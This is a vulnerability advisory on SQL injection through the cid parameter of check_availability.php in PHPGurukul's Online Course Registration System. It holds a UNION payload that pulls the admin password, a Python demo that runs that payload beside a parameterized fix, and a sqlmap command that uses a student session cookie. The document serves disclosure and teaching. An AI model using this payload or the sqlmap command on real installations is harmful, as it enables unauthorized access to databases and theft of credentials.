Title: SQL Injection Vulnerability in PHPGurukul Online Course Registration System ≤ 3.1

BUG_Author: angelkate

Affected Version: PHPGurukul Online Course Registration System ≤ 3.1

Vendor: PHPGurukul

Software: Online Course Registration System

Vulnerability Files:

  • /onlinecourse/check_availability.php

Description:

  1. SQL Injection via Course Availability Check:

    • In the file /onlinecourse/check_availability.php, the cid POST parameter is read straight from the request and concatenated into the SQL query strings without validation, escaping or a prepared statement.

    • The same unsanitized value reaches three different SQL queries in that file (lines 6, 17 and 19 below).

  2. Vulnerable Code - Line 6:

    $cid= $_POST["cid"];
    $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'");

  3. Vulnerable Code - Line 17:

    $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'");

  4. Vulnerable Code - Line 19:

    $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'");

  5. Exploiting the SQL Injection:

    • Because cid is interpolated into the query text, an attacker who can reach this endpoint (a logged-in student, as in the PoC below) can close the string literal and append their own SQL, reading data from other tables such as the admin table.

  6. Example SQL Injection Payload:

    cid=1' UNION SELECT password FROM admin-- -

    • MySQL only treats -- as a comment when it is followed by whitespace, so a bare -- directly before the closing quote of the original query does not comment out the rest of the WHERE clause; send -- - (or #) instead.

    • A UNION must return the same number of columns as the query it lands in: one column for the queries on lines 6 and 19, but SELECT * on line 17 returns every column of courseenrolls (at least course and studentRegno), so this single-column payload raises a column-count error there.
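
To make the mechanics concrete, the following is an added example (not code from this advisory or from PHPGurukul) that mirrors the three string-built queries from check_availability.php in Python against an in-memory SQLite database, runs the payload above through each of them, and places the same lookups with bound parameters beside them. The admin table layout (UserName, Password), the sample rows and the student registration number are constructed assumptions for the demo; the trailing "-- -" is used instead of a bare "--" because MySQL only treats "--" as a comment when whitespace follows it, and SQLite accepts that form too.

```python
import sqlite3

# Added example, not the project's code. Tables courseenrolls and course are
# named after the queries quoted in the advisory; the admin table columns and
# every row below are constructed sample data for the demo.
SCHEMA = """
CREATE TABLE courseenrolls (course TEXT, studentRegno TEXT);
CREATE TABLE course (id INTEGER, noofSeats INTEGER);
CREATE TABLE admin (UserName TEXT, Password TEXT);
INSERT INTO courseenrolls VALUES ('1', '10000001'), ('2', '10000002');
INSERT INTO course VALUES (1, 30), (2, 25);
INSERT INTO admin VALUES ('admin', 'Test@123');
"""

# The advisory's payload with "-- -" as the comment terminator (see the note
# above on MySQL's whitespace requirement after --).
PAYLOAD = "1' UNION SELECT Password FROM admin-- -"


def connect():
    """Fresh in-memory database populated with the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def build_vulnerable_sql(cid, regid):
    """The exact query strings the PHP builds, stray space before $regid included."""
    return {
        "line6": f"SELECT studentRegno FROM courseenrolls WHERE course='{cid}' and studentRegno=' {regid}'",
        "line17": f"SELECT * FROM courseenrolls WHERE course='{cid}'",
        "line19": f"SELECT noofSeats FROM course WHERE id='{cid}'",
    }


def run_vulnerable(con, cid, regid):
    """Execute the concatenated queries; a database error is returned as a string."""
    out = {}
    for name, sql in build_vulnerable_sql(cid, regid).items():
        try:
            out[name] = con.execute(sql).fetchall()
        except sqlite3.OperationalError as exc:
            # The UNION payload hits this for SELECT * (column-count mismatch).
            out[name] = f"error: {exc}"
    return out


def run_safe(con, cid, regid):
    """Same three lookups with placeholders: cid travels as data, never as SQL text."""
    return {
        "line6": con.execute(
            "SELECT studentRegno FROM courseenrolls WHERE course=? AND studentRegno=?",
            (cid, regid),
        ).fetchall(),
        "line17": con.execute(
            "SELECT * FROM courseenrolls WHERE course=?", (cid,)
        ).fetchall(),
        "line19": con.execute(
            "SELECT noofSeats FROM course WHERE id=?", (cid,)
        ).fetchall(),
    }


if __name__ == "__main__":
    con = connect()
    for name, sql in build_vulnerable_sql(PAYLOAD, "10000001").items():
        print(f"{name}: {sql}")
    print("concatenated:", run_vulnerable(con, PAYLOAD, "10000001"))
    print("parameterized:", run_safe(con, PAYLOAD, "10000001"))
```

Running it shows the admin password row coming back from the line 6 and line 19 queries, the column-count error from the SELECT * query on line 17, and empty results from all three parameterized versions, because the payload is compared as a literal course id and matches nothing. The same fix in the PHP itself is mysqli's prepare, bind_param and execute calls in place of string concatenation into mysqli_query; any non-numeric cid can additionally be rejected up front, since the course id is an integer key.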

Proof of Concept:

  1. Log in as a student and open the course enrollment page; the PoC reuses the PHPSESSID cookie of this student session for the sqlmap request in the next step.

    http://localhost/enroll.php

  2. SQLMap exploitation (replace xxx with the PHPSESSID from step 1 and adjust the path to the install directory, e.g. /onlinecourse/check_availability.php as in the file listing above):

    sqlmap -u "http://<target-ip>/check_availability.php" --data="cid=1" -p cid --cookie="PHPSESSID=xxx" --dbs